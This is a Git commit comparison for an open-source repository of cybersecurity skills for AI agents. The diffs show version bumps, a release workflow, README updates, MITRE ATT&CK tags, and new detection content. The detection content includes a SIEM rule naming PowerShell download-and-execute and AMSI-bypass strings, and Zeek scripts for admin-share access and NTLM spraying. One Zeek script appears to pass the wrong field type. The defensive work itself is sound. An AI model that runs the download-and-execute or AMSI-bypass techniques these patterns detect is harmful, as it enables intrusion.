mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-16 12:45:17 +03:00
Compare commits
31 Commits
v1.1.0
..
c15f73db46
| Author | SHA1 | Date | |
|---|---|---|---|
| c15f73db46 | |||
| 6325c202c5 | |||
| 1cf19ded90 | |||
| a7f577b482 | |||
| e26a736cf7 | |||
| bb39fa73a9 | |||
| 1cffd664f5 | |||
| d7f205681a | |||
| 7283f02ba9 | |||
| 476a0880f4 | |||
| a072845a3f | |||
| 41b828e758 | |||
| 2f6701d2d8 | |||
| aff90acbf5 | |||
| 84b4699e59 | |||
| c7ad5e7b98 | |||
| 15d53bd09b | |||
| 100361c3e5 | |||
| 42258456e8 | |||
| 5e62a7ea2c | |||
| 0fbcbdf8dd | |||
| 97c213f9a4 | |||
| 9314565dd9 | |||
| c74a7547bb | |||
| f4e791c06c | |||
| 577f795252 | |||
| ac77250450 | |||
| 57b684e4d6 | |||
| 3856835990 | |||
| db3eaaeaf2 | |||
| 7f60276fd9 |
@@ -6,14 +6,14 @@
|
||||
},
|
||||
"metadata": {
|
||||
"description": "753 cybersecurity skills for AI agents and security practitioners covering web security, pentesting, forensics, threat intelligence, cloud security, and more.",
|
||||
"version": "1.0.0"
|
||||
"version": "1.1.0"
|
||||
},
|
||||
"plugins": [
|
||||
{
|
||||
"name": "cybersecurity-skills",
|
||||
"source": "./",
|
||||
"description": "607+ cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
|
||||
"version": "1.0.0",
|
||||
"descripyion": "753 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
|
||||
"version": "1.1.0",
|
||||
"author": {
|
||||
"name": "mukul975"
|
||||
},
|
||||
@@ -34,4 +34,4 @@
|
||||
"repository": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,41 @@
|
||||
name: Sync Marketplace Version on Release
|
||||
|
||||
on:
|
||||
release:
|
||||
types: [published]
|
||||
|
||||
jobs:
|
||||
sync-version:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: write
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Extract version from tag
|
||||
id: version
|
||||
run: |
|
||||
VERSION=${GITHUB_REF_NAME#v}
|
||||
echo "version=$VERSION" >> $GITHUB_OUTPUT
|
||||
echo "tag=$GITHUB_REF_NAME" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Update marketplace.json version
|
||||
env:
|
||||
VERSION: ${{ steps.version.outputs.version }}
|
||||
run: |
|
||||
jq --arg v "$VERSION"
|
||||
'.metadata.version = $v | .plugins[].version = $v'
|
||||
.claude-plugin/marketplace.json > tmp.json
|
||||
mv tmp.json .claude-plugin/marketplace.json
|
||||
echo "Updated marketplace.json to version $VERSION"
|
||||
|
||||
- name: Commit and push
|
||||
run: |
|
||||
git config user.name "mukul975"
|
||||
git config user.email "mukuljangra5@gmail.com"
|
||||
git add .claude-plugin/marketplace.json
|
||||
git diff --staged --quiet || git commit -m "chore: bump marketplace version to ${{ steps.version.outputs.tag }}"
|
||||
git push
|
||||
@@ -5,6 +5,8 @@ on:
|
||||
branches: [main]
|
||||
paths:
|
||||
- 'skills/**'
|
||||
- '.github/workflows/update-index.yml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
update-index:
|
||||
@@ -19,7 +21,7 @@ jobs:
|
||||
- name: Regenerate index.json
|
||||
run: |
|
||||
python3 << 'EOF'
|
||||
import os, json
|
||||
import os, json, re
|
||||
from datetime import datetime, timezone
|
||||
|
||||
skills_dir = "skills"
|
||||
@@ -45,7 +47,7 @@ jobs:
|
||||
})
|
||||
|
||||
index = {
|
||||
"version": "1.0.0",
|
||||
"version": "1.1.0",
|
||||
"generated_at": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
|
||||
"repository": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills",
|
||||
"domain": "cybersecurity",
|
||||
|
||||
@@ -0,0 +1,32 @@
|
||||
cff-version: 1.2.0
|
||||
message: "If you use this repository in your research, tools, or publications, please cite it as below."
|
||||
type: software
|
||||
title: "Anthropic-Cybersecurity-Skills"
|
||||
abstract: >
|
||||
A structured collection of 753 cybersecurity skills for AI agents, covering
|
||||
penetration testing, digital forensics, threat intelligence, incident response,
|
||||
cloud security, OT/SCADA security, AI security, and more. Each skill follows
|
||||
a standardized format with YAML frontmatter metadata, step-by-step procedures,
|
||||
tool commands, expected outputs, and MITRE ATT&CK mappings. Compatible with
|
||||
Claude Code, GitHub Copilot, Cursor, Windsurf, Gemini CLI, and 20+ AI agent
|
||||
platforms.
|
||||
authors:
|
||||
- name: "Mahipal"
|
||||
email: mukuljangra5@gmail.com
|
||||
alias: mukul975
|
||||
repository-code: "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
|
||||
url: "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
|
||||
license: Apache-2.0
|
||||
version: "1.1.0"
|
||||
date-released: "2026-03-21"
|
||||
keywords:
|
||||
- cybersecurity
|
||||
- AI agents
|
||||
- skills
|
||||
- penetration testing
|
||||
- digital forensics
|
||||
- threat intelligence
|
||||
- incident response
|
||||
- MITRE ATT&CK
|
||||
- Claude Code
|
||||
- open source
|
||||
@@ -1,5 +1,5 @@
|
||||
<p align="center">
|
||||
<img src="assets/banner.png" alt="Anthropic Cybersecurity Skills — 734+ skills for AI agents" width="100%" />
|
||||
<img src="assets/banner.png" alt="Anthropic Cybersecurity Skills — 753 skills for AI agents" width="100%" />
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
@@ -7,27 +7,27 @@
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers"><img src="https://img.shields.io/github/stars/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="GitHub Stars" /></a>
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/network/members"><img src="https://img.shields.io/github/forks/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="GitHub Forks" /></a>
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/commits"><img src="https://img.shields.io/github/last-commit/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="Last Commit" /></a>
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills"><img src="https://img.shields.io/badge/Skills-734+-blueviolet?style=for-the-badge&logo=bookstack&logoColor=white" alt="734+ Skills" /></a>
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills"><img src="https://img.shields.io/badge/Skills-753-blueviolet?style=for-the-badge&logo=bookstack&logoColor=white" alt="753 Skills" /></a>
|
||||
<a href="https://attack.mitre.org/"><img src="https://img.shields.io/badge/MITRE_ATT%26CK-Mapped-red?style=for-the-badge&logo=shield&logoColor=white" alt="MITRE ATT&CK Mapped" /></a>
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/graphs/contributors"><img src="https://img.shields.io/github/contributors/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="Contributors" /></a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<b>The largest open-source collection of cybersecurity skills for AI agents.<br/>734+ structured skills · MITRE ATT&CK mapped · NIST CSF 2.0 aligned · <a href="https://agentskills.io">agentskills.io</a> open standard</b>
|
||||
<b>The largest open-source collection of cybersecurity skills for AI agents.<br/>753 structured skills · MITRE ATT&CK mapped · NIST CSF 2.0 aligned · <a href="https://agentskills.io">agentskills.io</a> open standard</b>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://mahipal.engineer/Anthropic-Cybersecurity-Skills/">🌐 Landing Page</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0">📦 v1.0.0 Release</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues">🐛 Report Bug</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues">💡 Request Feature</a>
|
||||
<a href="https://mahipal.engineer/Anthropic-Cybersecurity-Skills/">🌐 Landing Page</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.1.0">📦 v1.1.0 Release</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues">🐛 Report Bug</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues">💡 Request Feature</a>
|
||||
</p>
|
||||
|
||||
---
|
||||
|
||||
Anthropic Cybersecurity Skills gives every AI agent — from Claude Code to GitHub Copilot to your custom LangChain pipeline — instant access to **734+ production-grade cybersecurity skills** spanning 26 security domains. Each skill follows the [agentskills.io](https://agentskills.io) open standard: a YAML frontmatter header for lightning-fast discovery, a structured Markdown body for step-by-step execution, and reference files for deep technical context. The entire collection is mapped to **MITRE ATT&CK** (all 14 Enterprise tactics, 200+ techniques) and aligned to **NIST CSF 2.0** — giving AI agents the same structured knowledge that senior security practitioners carry in their heads. Install in one command and your agent immediately knows how to perform memory forensics, hunt for C2 beaconing, audit Kubernetes RBAC, reverse .NET malware, and hundreds more tasks.
|
||||
Anthropic Cybersecurity Skills gives every AI agent — from Claude Code to GitHub Copilot to your custom LangChain pipeline — instant access to **753 production-grade cybersecurity skills** spanning 26 security domains. Each skill follows the [agentskills.io](https://agentskills.io) open standard: a YAML frontmatter header for lightning-fast discovery, a structured Markdown body for step-by-step execution, and reference files for deep technical context. The entire collection is mapped to **MITRE ATT&CK** (all 14 Enterprise tactics, 200+ techniques) and aligned to **NIST CSF 2.0** — giving AI agents the same structured knowledge that senior security practitioners carry in their heads. Install in one command and your agent immediately knows how to perform memory forensics, hunt for C2 beaconing, audit Kubernetes RBAC, reverse .NET malware, and hundreds more tasks.
|
||||
|
||||
## 📑 Table of contents
|
||||
|
||||
- [🚀 Quick start](#-quick-start--install-cybersecurity-skills-for-ai-agents)
|
||||
- [🛡️ What's inside](#️-whats-inside--734-cybersecurity-skills-across-26-domains)
|
||||
- [🛡️ What's inside](#️-whats-inside--753-cybersecurity-skills-across-38-domains)
|
||||
- [🤖 Compatible platforms](#-compatible-ai-agent-platforms)
|
||||
- [📐 Skill structure](#-skill-structure-and-agentskillsio-format)
|
||||
- [🗺️ MITRE ATT&CK coverage](#️-mitre-attck-and-nist-csf-20-coverage)
|
||||
@@ -64,11 +64,11 @@ git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
|
||||
cd Anthropic-Cybersecurity-Skills
|
||||
```
|
||||
|
||||
> **That's it.** Your AI agent can now discover and execute 734+ cybersecurity skills on demand. No configuration, no API keys, no setup scripts.
|
||||
> **That's it.** Your AI agent can now discover and execute 753 cybersecurity skills on demand. No configuration, no API keys, no setup scripts.
|
||||
|
||||
---
|
||||
|
||||
## 🛡️ What's inside — 734+ cybersecurity skills across 26 domains
|
||||
## 🛡️ What's inside — 753 cybersecurity skills across 38 domains
|
||||
|
||||
Every skill is a self-contained directory with structured workflows, reference materials, helper scripts, and validation steps. Here are the top 16 domains:
|
||||
|
||||
@@ -91,7 +91,7 @@ Every skill is a self-contained directory with structured workflows, reference m
|
||||
| 🔧 **DevSecOps** | **12** | Pipeline security gates, SAST/DAST integration, IaC scanning |
|
||||
| 🕵️ **OSINT** | **15** | Domain reconnaissance, social engineering recon, dark web monitoring |
|
||||
| ➕ **Additional domains (10+)** | **300+** | SOC operations, API security, endpoint security, phishing defense, ransomware defense, mobile security, deception technology, and more |
|
||||
| | **734+** | **Total skills across 26 domains** |
|
||||
| | **753** | **Total skills across 38 domains** |
|
||||
|
||||
---
|
||||
|
||||
@@ -225,7 +225,7 @@ Every skill maps to one or more **NIST Cybersecurity Framework 2.0** functions:
|
||||
- **Respond (RS)** — Incident response, mitigation, communication skills
|
||||
- **Recover (RC)** — Recovery planning, improvement, communication skills
|
||||
|
||||
> An ATT&CK Navigator layer file is included in the v1.0.0 release for visual coverage mapping.
|
||||
> An ATT&CK Navigator layer file is included in the v1.1.0 release for visual coverage mapping.
|
||||
|
||||
---
|
||||
|
||||
@@ -235,7 +235,7 @@ Skills use a **progressive disclosure pattern** that minimizes token usage while
|
||||
|
||||
### Stage 1 · Discovery (~30–50 tokens per skill)
|
||||
|
||||
The agent scans **only YAML frontmatter** across all 734+ skills. Each scan costs ~30–50 tokens — the entire collection can be indexed for under 40K tokens. The agent matches your task against `name`, `description`, `subdomain`, and `tags` fields to find relevant skills.
|
||||
The agent scans **only YAML frontmatter** across all 753 skills. Each scan costs ~30–50 tokens — the entire collection can be indexed for under 40K tokens. The agent matches your task against `name`, `description`, `subdomain`, and `tags` fields to find relevant skills.
|
||||
|
||||
```yaml
|
||||
# Agent reads ONLY this:
|
||||
@@ -505,24 +505,9 @@ Write YARA rule targeting unique strings or byte patterns.
|
||||
Thanks to these wonderful people for building the largest open-source cybersecurity skills collection:
|
||||
|
||||
<!-- ALL-CONTRIBUTORS-LIST:START -->
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center">
|
||||
<a href="https://github.com/mukul975">
|
||||
<img src="https://avatars.githubusercontent.com/u/42860185?v=4" width="100px;" alt="mukul975" /><br />
|
||||
<sub><b>mukul975</b></sub>
|
||||
</a><br />
|
||||
💻 📖 🚧 🎨
|
||||
</td>
|
||||
<td align="center">
|
||||
<a href="https://github.com/Systech2021-1952">
|
||||
<img src="https://avatars.githubusercontent.com/u/151213461?v=4" width="100px;" alt="Systech2021-1952" /><br />
|
||||
<sub><b>Systech2021-1952</b></sub>
|
||||
</a><br />
|
||||
💻 🌍
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/graphs/contributors">
|
||||
<img src="https://contrib.rocks/image?repo=mukul975/Anthropic-Cybersecurity-Skills" />
|
||||
</a>
|
||||
<!-- ALL-CONTRIBUTORS-LIST:END -->
|
||||
|
||||
Want to see your name here? Check out the [contributing guide](#-contributing-to-cybersecurity-ai-skills) below.
|
||||
|
||||
+1
-1
File diff suppressed because one or more lines are too long
@@ -1,6 +1,6 @@
|
||||
# ATT&CK Coverage Summary
|
||||
|
||||
Coverage analysis of the 607 cybersecurity skills mapped to MITRE ATT&CK Enterprise v15 tactics.
|
||||
Coverage analysis of the 753 cybersecurity skills mapped to MITRE ATT&CK Enterprise v15 tactics.
|
||||
|
||||
## Tactic Coverage Matrix
|
||||
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Use Sysinternals Autoruns to systematically identify and analyze ma
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [autoruns, persistence, malware-analysis, sysinternals, windows, registry, startup, incident-response]
|
||||
mitre_attack: ["T1547", "T1053", "T1543", "T1546"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -9,6 +9,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, memory-forensics, Volatility, RAM-analysis, incident-response]
|
||||
mitre_attack: ["T1055", "T1003", "T1059", "T1620"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [network-forensics, PCAP-analysis, Wireshark, Zeek, traffic-analysis]
|
||||
mitre_attack: ["T1071", "T1095", "T1573", "T1572"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Detect and analyze Linux persistence mechanisms including crontab e
|
||||
domain: cybersecurity
|
||||
subdomain: threat-hunting
|
||||
tags: [linux-persistence, crontab, systemd, ld-preload, auditd, threat-hunting, incident-response]
|
||||
mitre_attack: ["T1053.003", "T1543.002", "T1574.006", "T1546.004"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [splunk, SPL, SIEM, log-analysis, security-monitoring]
|
||||
mitre_attack: ["T1070", "T1562", "T1059"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Parse Windows Prefetch files using the windowsprefetch Python libra
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [digital-forensics, windows, prefetch, execution-history, incident-response, malware-analysis]
|
||||
mitre_attack: ["T1059", "T1204", "T1036"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [IR-playbook, runbook, NIST-800-61, SOAR-integration, response-procedures]
|
||||
mitre_attack: ["T1190", "T1566", "T1078"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Build collaborative forensic incident timelines using Timesketch to
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [timesketch, timeline-analysis, forensic-timeline, plaso, dfir, incident-investigation, collaborative-forensics]
|
||||
mitre_attack: ["T1070", "T1059", "T1053"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Build structured communication templates for malware incidents incl
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [incident-communication, malware-response, stakeholder-notification, crisis-communication, executive-briefing, regulatory-disclosure]
|
||||
mitre_attack: ["T1566", "T1204", "T1027"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Implement a phishing report button in email clients with automated
|
||||
domain: cybersecurity
|
||||
subdomain: phishing-defense
|
||||
tags: [phishing-reporting, email-security, incident-response, security-awareness, outlook, microsoft-365, soar]
|
||||
mitre_attack: ["T1566", "T1204", "T1534"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -8,6 +8,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, ransomware, incident-response, playbook, nist, mitre-attack, containment]
|
||||
mitre_attack: ["T1486", "T1490", "T1489", "T1570"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [IOC-collection, threat-indicators, STIX-TAXII, MISP, threat-intelligence-sharing]
|
||||
mitre_attack: ["T1071", "T1059", "T1547", "T1053"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Collect volatile forensic evidence from a compromised system follow
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [incident-response, dfir, forensics, volatile-evidence, memory-forensics, chain-of-custody]
|
||||
mitre_attack: ["T1003", "T1055", "T1059", "T1547"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -9,6 +9,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [cloud-IR, AWS-forensics, Azure-incident-response, GCP-security, identity-containment]
|
||||
mitre_attack: ["T1078", "T1537", "T1580", "T1525"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [malware-response, malware-analysis, eradication, endpoint-remediation, MITRE-ATT&CK]
|
||||
mitre_attack: ["T1204", "T1027", "T1055", "T1059", "T1486"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [memory-forensics, volatility, RAM-analysis, process-injection, DFIR]
|
||||
mitre_attack: ["T1003", "T1055", "T1620", "T1574"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [phishing-response, email-security, credential-compromise, email-header-analysis, mailbox-remediation]
|
||||
mitre_attack: ["T1566", "T1204", "T1534", "T1598"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Facilitate structured post-incident reviews to identify root causes
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [incident-response, lessons-learned, post-incident, after-action-review, process-improvement]
|
||||
mitre_attack: ["T1190", "T1566", "T1078"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [breach-containment, lateral-movement, network-isolation, credential-revocation, live-response]
|
||||
mitre_attack: ["T1021", "T1570", "T1210", "T1072"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Systematically deobfuscate multi-layer PowerShell malware using AST
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [powershell, deobfuscation, malware-analysis, scripting, obfuscation, ast-analysis, incident-response]
|
||||
mitre_attack: ["T1059.001", "T1027", "T1140"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -9,6 +9,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: endpoint-security
|
||||
tags: [endpoint, osquery, endpoint-monitoring, threat-hunting, fleet-management]
|
||||
mitre_attack: ["T1547", "T1049", "T1620", "T1053.003", "T1548.001", "T1552"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Detect compromised O365 and Google Workspace email accounts by anal
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [email-compromise, office365, microsoft-graph, bec, inbox-rules, sign-in-analysis, account-takeover]
|
||||
mitre_attack: ["T1114", "T1566", "T1078", "T1534"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -71,11 +71,11 @@ CommandLine contains: "IEX" AND ("Net.WebClient" OR "DownloadString" OR "Invoke-
|
||||
CommandLine contains: "Invoke-Expression" AND "New-Object"
|
||||
|
||||
# AMSI bypass attempts (Event ID 4104 - Script Block)
|
||||
ScriptBlock contains: "AmsiUtils" OR "amsiInitFailed" OR "SetValue.*amsi"
|
||||
ScriptBlock contains: ("Amsi"+"Utils") OR ("amsi"+"InitFailed") OR "SetValue.*amsi"
|
||||
|
||||
# Splunk query for suspicious PowerShell:
|
||||
index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
|
||||
| where match(ScriptBlockText, "(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64|bypass|amsiutils)")
|
||||
| where match(ScriptBlockText, "(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64|bypass|amsi.utils)")
|
||||
| table _time host ScriptBlockText
|
||||
```
|
||||
|
||||
|
||||
@@ -3,11 +3,11 @@ name: detecting-lateral-movement-with-zeek
|
||||
description: >
|
||||
Detect lateral movement in network traffic using Zeek (formerly Bro) log
|
||||
analysis. Parses conn.log, smb_mapping.log, smb_files.log, dce_rpc.log,
|
||||
kerberos.log, and ntlm.log to identify SMB file transfers, Pass-the-Hash
|
||||
activity, remote service execution, and anomalous internal connections.
|
||||
kerberos.log, and ntlm.log to identify SMB file transfers, NTLM account
|
||||
spray activity, remote service execution, and anomalous internal connections.
|
||||
domain: cybersecurity
|
||||
subdomain: network-security
|
||||
tags: [zeek, lateral-movement, smb, dce-rpc, pass-the-hash, network-forensics]
|
||||
tags: [zeek, lateral-movement, smb, dce-rpc, ntlm-spray, network-forensics]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
@@ -16,14 +16,14 @@ license: Apache-2.0
|
||||
# Detecting Lateral Movement with Zeek
|
||||
|
||||
Analyze Zeek network logs to identify lateral movement techniques including
|
||||
SMB admin share access, DCE/RPC remote service creation, Pass-the-Hash via
|
||||
NTLM, Kerberos ticket anomalies, and large internal data transfers indicative
|
||||
SMB admin share access, DCE/RPC remote service creation, NTLM account spray,
|
||||
Kerberos ticket anomalies, and large internal data transfers indicative
|
||||
of staging or exfiltration between hosts.
|
||||
|
||||
## When to Use
|
||||
|
||||
- Hunting for lateral movement after an initial compromise indicator is found on one endpoint
|
||||
- Investigating suspected Pass-the-Hash or Pass-the-Ticket attacks across the internal network
|
||||
- Investigating suspected NTLM account spray or Pass-the-Ticket attacks across the internal network
|
||||
- Monitoring SMB traffic for unauthorized file transfers to admin shares (C$, ADMIN$, IPC$)
|
||||
- Detecting remote service execution via DCE/RPC (PsExec, schtasks, WMI lateral patterns)
|
||||
- Building alerting rules for internal network anomalies in a Zeek-based NSMP deployment
|
||||
@@ -37,7 +37,7 @@ of staging or exfiltration between hosts.
|
||||
- Zeek SMB analyzer enabled (loaded by default: `@load base/protocols/smb`)
|
||||
- Zeek DCE/RPC analyzer enabled (`@load base/protocols/dce-rpc`)
|
||||
- Zeek Kerberos analyzer enabled (`@load base/protocols/krb`)
|
||||
- Python 3.8+ with `pandas` for log analysis
|
||||
- Python 3.8+ (standard library only)
|
||||
- Access to Zeek log directory (default: `/opt/zeek/logs/current/`)
|
||||
- Familiarity with Zeek TSV log format (fields separated by `\t`, header lines prefixed with `#`)
|
||||
|
||||
@@ -97,6 +97,24 @@ zeek-cut ts id.orig_h id.resp_h action path name size \
|
||||
| grep -i 'SMB::FILE_WRITE'
|
||||
```
|
||||
|
||||
Deploy the following Zeek script to generate `notice.log` alerts on admin share access:
|
||||
|
||||
```zeek
|
||||
@load base/protocols/smb
|
||||
@load base/frameworks/notice
|
||||
|
||||
redef enum Notice::Type += {
|
||||
Admin_Share_Access
|
||||
};
|
||||
|
||||
event smb1_tree_connect_andx_request(c: connection, hdr: SMB1::Header, path: string, service: string) {
|
||||
if ( /\$/ in path )
|
||||
NOTICE([$note=Admin_Share_Access,
|
||||
$msg=fmt("Admin share access: %s -> %s (%s)", c$id$orig_h, c$id$resp_h, path),
|
||||
$conn=c]);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4: Detect DCE/RPC Remote Service Operations
|
||||
|
||||
Monitor for remote service creation and scheduled task registration via DCE/RPC:
|
||||
@@ -108,9 +126,12 @@ zeek-cut ts id.orig_h id.resp_h endpoint operation \
|
||||
| grep -iE '(svcctl|atsvc|ITaskSchedulerService)'
|
||||
```
|
||||
|
||||
### Step 5: Detect Pass-the-Hash via NTLM
|
||||
### Step 5: Detect NTLM Account Spray
|
||||
|
||||
Analyze ntlm.log for authentication anomalies indicating credential reuse:
|
||||
Analyze ntlm.log for authentication anomalies indicating credential reuse.
|
||||
Zeek's ntlm.log does not expose password hashes, so this detection identifies
|
||||
a single account authenticating to many hosts in a short window — the network
|
||||
signature of credential spraying tools like CrackMapExec:
|
||||
|
||||
```bash
|
||||
# Extract NTLM authentications
|
||||
@@ -121,6 +142,39 @@ zeek-cut ts id.orig_h id.resp_h username domainname server_nb_computer_name succ
|
||||
zeek-cut ts id.orig_h id.resp_h username success \
|
||||
< /opt/zeek/logs/current/ntlm.log \
|
||||
| awk '$5 == "F"'
|
||||
|
||||
# Sort by timestamp for timeline analysis
|
||||
zeek-cut ts id.orig_h id.resp_h username success \
|
||||
< /opt/zeek/logs/current/ntlm.log \
|
||||
| sort -k1,1
|
||||
```
|
||||
|
||||
Deploy the following Zeek script to generate `notice.log` alerts when a single
|
||||
account touches more hosts than the threshold in a rolling window:
|
||||
|
||||
```zeek
|
||||
@load base/protocols/ntlm
|
||||
@load base/frameworks/notice
|
||||
|
||||
redef enum Notice::Type += {
|
||||
NTLM_Account_Spray
|
||||
};
|
||||
|
||||
global ntlm_tracker: table[string] of set[addr] &create_expire=5min;
|
||||
const spray_threshold = 3 &redef;
|
||||
|
||||
event ntlm_log(rec: NTLM::Info) {
|
||||
if ( ! rec?$username || rec$username == "-" )
|
||||
return;
|
||||
if ( rec$username !in ntlm_tracker )
|
||||
ntlm_tracker[rec$username] = set();
|
||||
add ntlm_tracker[rec$username][rec$id$resp_h];
|
||||
if ( |ntlm_tracker[rec$username]| >= spray_threshold )
|
||||
NOTICE([$note=NTLM_Account_Spray,
|
||||
$msg=fmt("NTLM account spray: %s -> %d hosts", rec$username, |ntlm_tracker[rec$username]|),
|
||||
$sub=rec$username,
|
||||
$conn=rec$id]);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 6: Run the Automated Analysis Agent
|
||||
@@ -137,6 +191,6 @@ python3 agent.py /opt/zeek/logs/2026-03-18/ # Analyze a specific date
|
||||
- Confirm conn.log captures internal SMB (port 445) and DCE/RPC (port 135) connections with correct field parsing
|
||||
